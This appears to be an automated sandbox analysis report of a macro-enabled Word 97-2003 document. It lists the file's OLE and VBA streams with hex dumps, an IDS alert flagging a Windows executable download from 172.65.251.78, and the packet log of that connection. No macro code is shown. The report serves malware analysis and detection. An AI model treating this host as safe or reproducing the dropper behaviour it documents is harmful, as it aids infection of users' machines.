      Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:\x5DocumentSummaryInformation
      CLSID:
      File Type:data
      Stream Size:4096
      Entropy:0.2422585220829246
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
      General
      Stream Path:\x5SummaryInformation
      CLSID:
      File Type:data
      Stream Size:4096
      Entropy:0.46499681261754333
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A D M I N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
      General
      Stream Path:1Table
      CLSID:
      File Type:data
      Stream Size:7125
      Entropy:5.907354428979548
      Base64 Encoded:True
      Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
      Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
      General
      Stream Path:Macros/PROJECT
      CLSID:
      File Type:ASCII text, with CRLF line terminators
      Stream Size:637
      Entropy:5.316181456865122
      Base64 Encoded:True
      Data ASCII:I D = " { 8 C 4 D 9 E 8 1 - A C 0 C - 4 5 3 B - A 9 F 2 - 3 2 3 F 8 B D 6 B 2 D 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . C l a s s = k e o a o e . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 3 . . M o d u l e = M o d u l e 1 1 . . C l a s s = T h i s D o c u m e n t 1 . . H e l p F i l e = " 1 0 0 7 4 6 3 5 0 " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G
      Data Raw:49 44 3d 22 7b 38 43 34 44 39 45 38 31 2d 41 43 30 43 2d 34 35 33 42 2d 41 39 46 32 2d 33 32 33 46 38 42 44 36 42 32 44 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 43 6c 61 73 73 3d 6b 65 6f 61 6f 65 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 4d 6f 64
      General
      Stream Path:Macros/PROJECTwm
      CLSID:
      File Type:data
      Stream Size:179
      Entropy:3.348554679064766
      Base64 Encoded:False
      Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . k e o a o e . k . e . o . a . o . e . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . M o d u l e 1 1 . M . o . d . u . l . e . 1 . 1 . . . T h i s D o c u m e n t 1 . T . h . i . s . D . o . c . u . m . e . n . t . 1 . . . . .
      Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6b 65 6f 61 6f 65 00 6b 00 65 00 6f 00 61 00 6f 00 65 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 4d 6f 64 75 6c 65 31 31 00 4d 00 6f 00 64 00 75 00 6c 00 65
      General
      Stream Path:Macros/VBA/_VBA_PROJECT
      CLSID:
      File Type:data
      Stream Size:7153
      Entropy:5.615254486098057
      Base64 Encoded:True
      Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
      Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      General
      Stream Path:Macros/VBA/__SRP_0
      CLSID:
      File Type:data
      Stream Size:1899
      Entropy:3.57014347674237
      Base64 Encoded:False
      Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a N ~ G q @ 1 ) T . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . .
      Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 04 00 06 00 04 00 06 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00 00 00 00
      General
      Stream Path:Macros/VBA/__SRP_1
      CLSID:
      File Type:data
      Stream Size:239
      Entropy:2.0304487142653334
      Base64 Encoded:True
      Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 0 0 7 4 6 3 5 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff b1 00 00 00 00 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      General
      Stream Path:Macros/VBA/__SRP_2
      CLSID:
      File Type:data
      Stream Size:532
      Entropy:2.0423409612990255
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . . . i . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 01 00 11 08 00 00 00 00 00 00 00 00 00 00 41 08 00 00 00 00 00 00 00 00 00 00 71 08
      General
      Stream Path:Macros/VBA/__SRP_3
      CLSID:
      File Type:data
      Stream Size:156
      Entropy:1.7948868758912513
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e0 0d 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      General
      Stream Path:Macros/VBA/dir
      CLSID:
      File Type:data
      Stream Size:711
      Entropy:6.534770648575581
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . . . ( . . @ . . . . . . . . 1 0 0 7 4 6 3 h 5 0 = . . . . . P . . . . . . . r i . $ . . . 4 . < . . . . . . . . s t d o l e . > . . s . t . d . . o . l . e . . . . h . . ^ . . * \\ G { . 0 0 0 2 0 4 3 0 v - . . . . C . . . . . . 0 . 0 4 6 } # 2 . 0 . # 0 # C : \\ W i . n d o w s \\ S y s t e m 3 2 \\ . e . 2 . t l b # O L . E A u t o m a p t i o n . 0 . . E N o r m a l E N C r . m . a F . . . { * \\ C . . . . @ r i . . ! O . f
      Data Raw:01 c3 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 11 00 28 00 00 40 02 14 06 00 09 01 00 0e 31 30 30 37 34 36 33 68 35 30 3d 0b 1c 07 02 90 01 50 08 05 06 12 09 02 12 a8 b3 72 69 0a 24 00 0c 01 34 00 3c 02 05 16 00 02 06 00 07 73 74 64 6f 6c 65 02 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d
      General
      Stream Path:WordDocument
      CLSID:
      File Type:data
      Stream Size:4096
      Entropy:1.2593599573604841
      Base64 Encoded:False
      Data ASCII:. U . . . . . . . . . . . . 0 . . . . . . . . 0 . . . . . b j b j n n . . . . . . . . . . . . . . . . . . . . . . . . . . . a . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . .
      Data Raw:ec a5 c1 00 55 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 30 00 00 00 00 00 08 00 00 30 08 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
      2025-01-14T15:42:10.130500+01002022640ET MALWARE PE EXE or DLL Windows file download Text M21172.65.251.78443192.168.2.449742TCP
      TimestampSource PortDest PortSource IPDest IP
      Jan 14, 2025 15:42:09.116205931 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:09.116245985 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:09.116771936 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:09.133588076 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:09.133604050 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:09.626298904 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:09.626718998 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:09.678579092 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:09.678613901 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:09.678987980 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:09.681165934 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:09.682471991 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:09.723335028 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016483068 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016556025 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016648054 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016675949 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.016684055 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016706944 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016724110 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.016771078 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.016771078 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.016850948 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016900063 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.016905069 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016932964 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016952991 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.016957998 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.016994953 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.017035007 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.017771006 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.017819881 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.017843962 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.017848969 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.017905951 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.017905951 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.126832962 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.127022982 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.127053976 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.127343893 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.127343893 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.127377987 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.127969980 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.128158092 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.128205061 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.128523111 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.128523111 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.128530025 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.128824949 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.129584074 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.129641056 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.129667044 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.129692078 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.130043030 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.130043030 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.130043030 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.130052090 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.130400896 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.130448103 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.130451918 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.130481958 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.130508900 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.131165981 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.131165981 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.131165981 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.131172895 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.131356955 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.131361008 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.131397963 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.131777048 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.132677078 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.132677078 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.132677078 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.132683992 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.132734060 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.219614029 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.219682932 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.219750881 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.219835043 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.219913960 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.219979048 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.220005035 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.220016003 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.220029116 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.220050097 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.220077038 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.220082045 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.220494986 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.220494986 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.220895052 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.220948935 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.220983028 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.220988035 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.221024990 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.221024990 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.221224070 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.221366882 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.221391916 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.221540928 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.221580029 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.221625090 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.222495079 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.222495079 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.222498894 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.222546101 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.311602116 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.311964035 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.312475920 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.312964916 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.312964916 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.312964916 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.312994003 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.313163996 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.314074039 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.317883968 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.317883968 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.317883968 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.317905903 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.317933083 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.321157932 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.321157932 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.321171045 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.321186066 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.325879097 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.325879097 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.403405905 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.403543949 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.403978109 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.405881882 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.405881882 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.405881882 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.405903101 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.408483982 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.409899950 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.409899950 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.409907103 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.409933090 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.409960985 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.413583994 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.413583994 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.413590908 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.417916059 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.495743036 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.495769978 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.495896101 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.496758938 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.496884108 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.496884108 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.496884108 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.496906042 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.497087955 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.497694016 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.498948097 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.498948097 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.498948097 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.498959064 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.502949953 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.588326931 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.588357925 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.588800907 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.588884115 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.588884115 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.588884115 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.588895082 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.588916063 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.588931084 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.589402914 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:10.589442968 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:10.589442968 CET49742443192.168.2.4172.65.251.78
